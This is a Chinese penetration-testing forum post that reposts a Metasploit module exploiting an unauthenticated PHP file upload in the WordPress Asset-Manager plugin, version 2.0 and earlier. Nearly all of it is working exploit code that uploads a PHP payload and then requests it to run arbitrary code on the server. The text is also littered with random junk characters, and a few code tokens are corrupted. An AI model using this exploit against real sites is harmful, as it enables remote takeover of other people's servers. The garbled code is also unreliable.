中国网络渗透测试联盟

标题: WordPress Asset-Manager PHP文件上传漏洞 [打印本页]
作者: admin    时间: 2012-12-31 09:22
标题: WordPress Asset-Manager PHP文件上传漏洞
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。  R# m& w- Q+ }) \

4 o" I; a9 q' o2 p##2 U: j/ [; L5 B& t
# This file is part of the Metasploit Framework and may be subject to0 S8 ^' q5 h7 X/ j  h3 `
# redistribution and commercial restrictions. Please see the Metasploit
6 [/ P, I+ D3 A# Framework web site for more information on licensing and terms of use.
4 ]) D- A2 w4 k! q1 r#   http://metasploit.com/framework/
% f0 c. X& \+ P4 ~' [2 p, ^##
8 y7 J/ b9 ~5 s3 h; a! v : {3 i* z9 e) z7 h7 p
require 'msf/core'8 [: s5 U7 Q. O8 |6 Q
require 'msf/core/exploit/php_exe'
; t* n1 a' g4 R7 p4 D4 Q" p( r , |& F8 I1 K4 {' N, A3 D7 U
class Metasploit3 < Msf::Exploit::Remote
4 Z( q6 \$ Z7 R7 Z1 F0 ]- m  s  Rank = ExcellentRanking& }8 v+ G' e' _* K# ~
$ ^9 O3 v! r3 q4 J5 _
  include Msf::Exploit::Remote::HttpClient! d1 L. E* Y% h
  include Msf::Exploit:hpEXE0 ?9 c' K; F' K* C

( T! d# Z. t8 {8 c- C* U  def initialize(info = {})
+ Q  Y5 v+ E# X3 _2 {  W5 Z    super(update_info(info,
* u* y+ X/ \# @& g" u      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',# S0 t' N! ]) ^  V
      'Description'    => %q{# B# i" {/ N. H. e/ M3 p4 F6 t
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
/ M# b5 R/ _7 o5 f% @% ^, f# y; J        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
$ h1 F: G* ?' q6 H        temp directory without authentication, which results in arbitrary code execution.4 S( H3 c6 o9 \& Z
      },
& u6 D8 ?2 |/ c      'Author'         =>1 s% ]* d3 t" L+ N5 t
        [
, A* [: d8 A  T2 e* H, r5 f          'Sammy FORGIT', # initial discovery
8 A, s. I( r$ |3 N7 [9 E! g( {3 ?          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
9 \6 T/ C5 R  j8 ~6 H6 a        ],- I- Y0 L8 O. x* Y; C$ B
      'License'        => MSF_LICENSE,
. N: w2 a, `, j9 s5 B4 _3 Z; i      'References'     =>% r# Y$ l2 \' y2 W" {
        [: p1 x* `$ A$ H* F  {8 g# J$ s( \0 Y
          [ 'OSVDB', '82653' ],* ~' Q+ m* L. U& C: y5 S
          [ 'BID', '53809' ],
9 F; Z! f( W% [' P/ Y          [ 'EDB', '18993' ],1 @$ t9 A0 l$ ?5 w
          [ 'URL', 'http:// www.myhack58.com /' ]6 n6 Q3 k  O% A( `& c# R
        ],
9 j' Q0 B" Z' H' r' z      'Payload'       =>8 {2 }' O; K: Y( t
        {
5 ~1 m/ h9 x3 G" ]4 E          'BadChars' => "\x00",
+ q1 E4 Q7 B7 [/ L' J: l( Z$ ]        },/ S9 h, k; |5 l( a% F$ O
      'Platform'       => 'php',  f" e; }% P3 _8 J
      'Arch'           => ARCH_PHP,& C/ @( `' o- O" B
      'Targets'        =>
' f( r' c$ ^; ?* g1 z        [; D( u! R1 G0 Z- B; T
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],/ |) s- B" U3 {+ v  C$ L7 d* h! \( s* v, |
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]% `; v2 R) g, }: |' A
        ],% T& m2 X. Y# c  _" |! z
      'DefaultTarget' => 0,* B+ R4 ~3 v- k* v
      'DisclosureDate' => 'May 26 2012'))2 e+ P% j) {6 B) r1 a% u

9 G5 ?  Q: ?) Q2 m  k    register_options(
0 P# h. E7 I/ C" B2 A( l$ b      [
* _" E. x" Z. J) C! ~        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
! {; E' [! f: n# i1 A3 ?1 j1 d      ], self.class)
( V' q2 r# }7 S( n  end
& o9 n! Y# j$ X
+ ]( p5 O1 g* q# B+ j. ^/ h  def exploit
& V/ f0 |8 `* B- G: k    uri =  target_uri.path
4 d; d6 m  U) ^% S2 H. u* a    uri << '/' if uri[-1,1] != '/'
# L) F; t8 r9 C    peer = "#{rhost}:#{rport}"% `: T3 @/ n+ @  h, w1 R$ j
    payload_name = "#{rand_text_alpha(5)}.php"
) n! ]: Q  m% S: |; G1 I  a    php_payload = get_write_exec_payload(:unlink_self=>true)' i. E5 t6 X: K) d5 M5 [
& `: Y4 Q7 j- {4 W
    data = Rex::MIME::Message.new
# Y! }" d- c% {" ^( \    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")7 S; }  k0 R- t( S- m
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
& ?3 Q& P) K- ^& i/ ~& W  X3 J   j3 z& x/ x1 y
    print_status("#{peer} - Uploading payload #{payload_name}")0 }" N. D8 [0 N
    res = send_request_cgi({
- i" }! T4 g/ Y2 x% }      'method'  => 'POST',1 s: H: o. S# T, u" N0 d3 I+ z
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",0 @- z0 _* i( j
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
2 m7 Y2 A' G6 ~) h$ w- l6 N% O      'data'    => post_data
+ C- j3 p& ]6 N/ @# D( M    })
3 d7 r2 M% ]. P7 M 2 \9 D! s1 {/ h. F' e3 m1 S
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
# _. i1 G( q9 N  J      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
, r1 g4 t; I  i" [( Q! \* S2 ^end2 m) H0 S+ G6 x$ ^4 n

* T0 _# d+ U/ H    print_status("#{peer} - Executing payload #{payload_name}"): t  F+ ^0 N8 @5 E2 ]4 Q
    res = send_request_raw({, R% W, J" H% F4 \
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
& j7 x  y  Y+ }& U) O! z      'method'  => 'GET'
8 H' R1 M# P1 Q! i: E( ?    })
. U6 z$ x7 |& \, f
& J! L3 w5 u  X/ v( m: @2 `: }8 n    if res and res.code != 2003 X$ u0 F; E  k8 X0 Y0 s$ |9 M' O5 |
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")' _: ^8 n0 `- b, {$ [! b/ b1 L
    end& w5 P5 E' D: M! b) Y1 a
  end
5 i2 I& p  e5 m$ }end% K0 G$ a( {- S3 L! o( V; p




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2